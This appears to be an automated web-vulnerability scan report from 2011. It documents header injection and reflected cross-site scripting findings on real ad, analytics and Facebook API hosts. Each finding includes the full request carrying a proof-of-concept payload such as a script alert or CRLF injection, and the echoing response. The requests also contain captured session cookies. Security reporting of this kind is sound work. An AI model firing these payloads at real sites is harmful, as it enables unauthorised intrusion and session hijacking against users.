1.11. http://us.ebayobjects.com/1ai/ebay.ebayus.58058/networking_and_communications [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.ebayobjects.com
Path:   /1ai/ebay.ebayus.58058/networking_and_communications

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 83fcc%0d%0ac9d46bf1ef4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /83fcc%0d%0ac9d46bf1ef4/ebay.ebayus.58058/networking_and_communications;cat=58058;cat=11176;seg=GL_Visitors;tcat=11175;items=548822;sz=160x600;ord=1297458429617;u=i_7019525320840896656%7Cm_172574;dcopt=ist;tile=1;um=0;us=13;eb_trk=172574;pr=20;xp=20;np=20;uz=;cg=f65c9e8712d0a0aa12e4b294ff6547f1 HTTP/1.1
Host: us.ebayobjects.com
Proxy-Connection: keep-alive
Referer: http://computers.shop.ebay.com/Networking-Communications-/11176/i.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/83fcc
c9d46bf1ef4
/ebay.ebayus.58058/networking_and_communications%3Bcat%3D58058%3Bcat%3D11176%3Bseg%3DGL_Visitors%3Btcat%3D11175%3Bitems%3D548822%3Bsz%3D160x600%3Bord%3D1297458429617%3Bu%3Di_7019525320840896656%7Cm_172574%3Bdcopt%3Dist%3Btile%3D1%3Bum%3D0%3Bus%3D13%3Beb_trk%3D172574%3Bpr%3D20%3Bxp%3D20%3Bnp%3D20%3Buz%3D%3Bcg%3Df65c9e8712d0a0aa12e4b294ff6547f1

<h1>Error 302 Moved Temporarily</h1>

2. Cross-site scripting (reflected)  previous
There are 130 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



2.1. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95cdf"-alert(1)-"14e796c9f61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=1333214&95cdf"-alert(1)-"14e796c9f61=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/hubs/hot/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1="b!!!!A!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL!!uiR!!!+J!$>dt!.5=<!$rtW!!!!$!?5%!%R%P3!ZZ<)!%[hn!%nsh~~~~~~<lQj6~~!!0iu!!!/`!$=vN!03UD!$b[P!!!!$!?5%!%R%P3!ZmB)!%Z6*!%Z6<~~~~~~<lR)/~~!#Ic<!+*gd!$e)@!/cMg!%:[h!!!!$!?5%!%nBY4!wVd.!'Cuk!#^3*!'?JV~~~~~<lRY,~~!#N(B!!!+o!$%i1!,Y*D!$dhw!!!!$!?5%!%nBY4!ZZ<)!%X++!%]s!~~~~~~<lRY.<pfD8~!#mP:!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mP>!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPA!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPD!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPG!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPJ!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#LI8!!!$h!#5Qg!0EGL!%<A9!!H<)!?5%!'2BP2!wVd.!$2)w!!j:k!'@?[~~~~~<m,_i<mEWd!!!#G!#LI9!!!$h!#5Qg!0EGL!%<A9!!H<)!?5%!'2BP2!wVd.!$2)w!!j:k!'@?[~~~~~<m,_i<mEWd!!!#G!#p!r!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<m8SQ!!.vL!#p!u!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<m8SQ!!.vL"; ih="b!!!!N!%!-u!!!!#<m9Vb!(4uP!!!!#<m8>D!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/WT!!!!#<m*Y#!+/Wc!!!!#<jbN?!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!-6s<!!!!#<m0_5!->h]!!!!%<m#26!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.T97!!!!#<k:^)!.`.U!!!!(<mZpq!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/?V,!!!!$<m!WT!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/S5#!!!!#<m*q.!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/o!S!!!!#<m05y!/oCq!!!!'<m8A]!/oD)!!!!#<m!Tu!/pg`!!!!#<mCQ(!/pga!!!!$<m*q+!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!00Gv!!!!#<l`GD!03?y!!!!#<m8Ab!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0!0C^(!!!!#<m8=j!0EGL!!!!#<m,_i!0LZy!!!!#<m,_`!0L[#!!!!$<m8>B"; vuday1=Gf(n`NFd*luBw.^; bh="b!!!%1!!$ha!!?fS<mZsO!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!%<m#np!!,D(!!!!'<m#np!!-?2!!!!*<m#np!!-G2!!!!$<lise!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!)<m#np!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!%<lmXb!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!(<m#np!!2)5!!!!#<m#np!!2a*!!!!#<ln<2!!4<u!!!!)<m#np!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!7gK!!!!#<lm]6!!<@x!!!!%<lSWC!!<P5!!!!#<m#np!!<P6!!!!#<m#np!!?VS!!DPb<lQiA!!C5(!!!!#<m#np!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L(^!!!!'<m8qE!!L_w!!!!+<m8qE!!MZU!!!!#<lQiC!!Mr(!!ErC<k0fB!!ObA!!!!$<m#np!!ObV!!!!$<m#np!!OgU!!!!(<m#np!!T[J!!!!$<lm]6!!Z-E!!!!$<m#np!!Z-G!!!!$<m#np!!Z-L!!!!$<m#np!!Zw`!!!!%<m#np!!Zwb!!!!'<m#np!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!g[x!!!!#<m#np!!hqJ!!!!#<lP]!!!iEC!!!!'<m#np!!iEb!!!!)<m#np!!i_9!!!!$<m#np!!jD6!!!!#<lja'!!mDJ!!!!#<lQq8!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!$<lmXb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!ti>!!!!#<m!S_!!u[u!!!!(<lVbU!!utd!!!!(<lVbU!!utl!!!!#<lSD*!!uto!!!!#<lVbU!!uu)!!!!%<lSVZ!!v:e!!!!(<m#np!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!#!vF!!!!#<m*gT!#!vL!!!!#<m*gT!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#')-!!!!#<k2yx!#*<R!!!!%<ln'v!#*VS!!!!#<jLPe!#+]S!!!!(<m#np!#,##!!!!'<lSWC!#-vv!!!!$<iC/K!#.dO!!!!+<m8qE!#/:a!!!!$<lmXf!#/G2!!!!$<m#np!#/G<!!!!$<m#np!#/GO!!!!$<m#np!#/j>!!!!#<m*gT!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!?fS<mZsO!#1=E!!!!#<kI4S!#2+>!!!!'<lS0M!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3(M!!!!#<m*gT!#3>,!!!!#<lmWu!#3>9!!!!#<lxx`!#3>C!!!!#<lxx]!#3>M!!!!#<lmdr!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!*<m#np!#8*^!!!!#<mC=k!#8.'!!!!$<lmXe!#8:i!!!!#<jc#c!#8?7!!!!$<lmXb!#8A2!!!!#<k11E!#<T3!!!!#<jbNC!#@7F!!!!#<m8qE!#@wb!!!!#<m*gT!#CC>!!!!#<lS@,!#F1H!!!!'<lS0M!#FGA!!!!%<ln'v!#Fu6!!!!$<lm]6!#Fw_!!!!%<ln'v!#I=D!!!!,<m915!#Ic1!!!!$<lmXc!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#LaM!!!!#<m,_i!#MP0!!!!#<jLPe!#MTC!!!!-<m9Vb!#MTF!!!!-<m9Vb!#MTH!!!!-<m9Vb!#MTI!!!!-<m9Vb!#MTJ!!!!-<m9Vb!#NjS!!!!#<lI#*!#O4F!!!!#<m*gT!#O4I!!!!#<m*gT!#O4M!!!!#<m*gT!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#OH-!!!!#<m*gT!#PqQ!!!!#<lI#)!#PrV!!!!#<kQRW!#Q+o!!!!+<m8qE!#Q<o!!!!#<mC=k!#Qh8!!!!#<l.yn!#RSx!!!!#<m*gT!#RY.!!!!'<m8qE!#Ri/!!!!+<m8qE!#Rij!!!!+<m8qE!#SCj!!!!%<m*l:!#SCk!!!!(<m8qG!#SUp!!!!(<m#np!#SVp!!!!#<m*gT!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!$<lmXe!#TnE!!!!*<m9Vb!#Tnp!!!!$<lmXb!#UDQ!!!!-<m9Vb!#UJ4!!!!#<m*gT!#UJ9!!!!#<m*gT!#UL(!!!!%<lQW%!#VYG!!!!(<mCr1!#V]o!!!!%<mCr1!#V]u!!!!'<mCr1!#V]v!!!!'<mCr1!#W,W!!!!'<mCr1!#W-B!!!!%<mCr1!#W-^!!!!%<mCr1!#W.*!!!!'<mCr1!#W.B!!!!#<m*XR!#W.Q!!!!'<mCr1!#W/5!!!!'<mCr1!#W/A!!!!'<mCr1!#W/J!!!!$<m:Vy!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X:Z!!!!#<m*gT!#X]+!!!!'<kdT!!#X]l!!!!'<m8qE!#Zb%!!!!#<m#np!#ZbF!!!!#<m#np!#ZbM!!!!#<m#np!#ZhT!!!!*<m#np!#Zmf!!!!$<kT`F!#[25!!!!%<lhqW!#[L>!!!!%<lise!#]%`!!!!$<m*Yw!#]DN!!!!#<m8qE!#]W%!!!!'<m8qE!#]Z#!!!!#<m#np!#^$?!!!!#<m*gT!#^0$!!!!(<m#np!#^0%!!!!(<m#np!#^Bo!!!!'<m8qE!#^d6!!!!$<m*Yw!#_+6!!!!#<m*gT!#_0t!!!!%<kTb(!#_1L!!!!#<m*gT!#`T=!!!!#<m#np!#`T>!!!!#<m#np!#`TF!!!!#<m#np!#`TG!!!!#<m#np!#`TJ!!!!#<m#np!#`TK!!!!#<m#np!#aCq!!!!'<lisd!#aG>!!!!+<m8qE!#aM'!!!!#<kp_p!#aly!!!!#<m*gT!#av4!!!!$<m!TH!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b?A!!!!#<l.x@!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#cC!!!!!#<ie2`!#dCU!!!!#<m*gT!#e)`!!!!#<m:W!!#e@W!!!!#<k_2)!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#fBj!!!!)<m#np!#fBk!!!!)<m#np!#fBm!!!!)<m#np!#fBn!!!!)<m#np!#fE=!!!!'<lQj,!#fG+!!!!)<m#np!#fJ/!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g/7!!!!(<m#np!#gC:!!!!#<lmdV!#gHO!!!!#<m*gT!#gPp!!!!#<m!TX!#gRx!!!!#<htU3!#g[h!!!!'<m8qE!#g]5!!!!#<lm]?!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#gq`!!!!#<m*gT!#h.N!!!!#<kL2n!#jRq!!!!#<mZv)!#jS>!!!!#<k_Jy!#mJR!!!!#<m8qE!#mP5!!!!$<lise!#mP6!!!!$<lise!#naX!!!!'<m8qE!#ndJ!!!!$<lP]'!#ndP!!!!$<lP]'!#ne$!!!!$<lP]'!#p#b!!!!'<m8qE!#p9d!!!!#<lj09!#pD8!!!!'<m8>B!#sx#!!!!3<m9Vd"

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:17:00 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Fri, 11 Feb 2011 18:17:00 GMT
Pragma: no-cache
Content-Length: 4645
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?95cdf"-alert(1)-"14e796c9f61=1&Z=728x90&s=1333214&_salt=2292189709";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

2.2. http://api.facebook.com/restserver.php [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 5381e<img%20src%3da%20onerror%3dalert(1)>9d6042fa9f7 was submitted in the method parameter. This input was echoed as 5381e<img src=a onerror=alert(1)>9d6042fa9f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats5381e<img%20src%3da%20onerror%3dalert(1)>9d6042fa9f7&urls=%5B%22http%3A%2F%2Fwww.quantcast.com%2Fcraigslist.org%3Fcountry%3DUS%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwiki.answers.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwiki.answers.com%252FQ%252FWhy_are_pro_forma_financial_statements_important_to_the_financial_planning_process%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Fri, 11 Feb 2011 18:15:20 GMT
Content-Length: 360

fb_sharepro_render({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats5381e<img src=a onerror=alert(1)>9d6042fa9f7"},{"key":"urls","value":"[\"http:\/\/www.quantcast.com\/craigslist.org?country=US\"]"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

2.3. http://api.facebook.com/restserver.php [urls parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 8585e<img%20src%3da%20onerror%3dalert(1)>f213777d1e9 was submitted in the urls parameter. This input was echoed as 8585e<img src=a onerror=alert(1)>f213777d1e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.quantcast.com%2Fcraigslist.org%3Fcountry%3DUS%22%5D8585e<img%20src%3da%20onerror%3dalert(1)>f213777d1e9&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwiki.answers.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwiki.answers.com%252FQ%252FWhy_are_pro_forma_financial_statements_important_to_the_financial_planning_process%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 11 Feb 2011 10:17:39 -0800
Pragma:
X-Cnection: close
Date: Fri, 11 Feb 2011 18:15:39 GMT
Content-Length: 376

fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/www.quantcast.com\/craigslist.org?country=US\"]8585e<img src=a onerror=alert(1)>f213777d1e9"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

2.4. http://api.viglink.com/api/ping [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 7e217<script>alert(1)</script>53abc6bf11f was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ping?format=jsonp&key=2b0adaafa9ad8a29fede7758fada17307e217<script>alert(1)</script>53abc6bf11f&loc=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F219333%2Fonline_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html%3Ftk%3Dhp_fv&v=1&jsonp=vglnk_jsonp_12974526338310 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html?tk=hp_fv
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 11 Feb 2011 19:30:09 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 97

error: Unknown api key: 2b0adaafa9ad8a29fede7758fada17307e217<script>alert(1)</script>53abc6bf11f

2.5. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 1d93c<script>alert(1)</script>f83ad48726e was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=81d93c<script>alert(1)</script>f83ad48726e&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"81d93c<script>alert(1)</script>f83ad48726e", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.6. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 7e92c<script>alert(1)</script>29a2dc4c34a was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=&c15=7e92c<script>alert(1)</script>29a2dc4c34a HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:36 GMT
Date: Fri, 11 Feb 2011 18:49:36 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
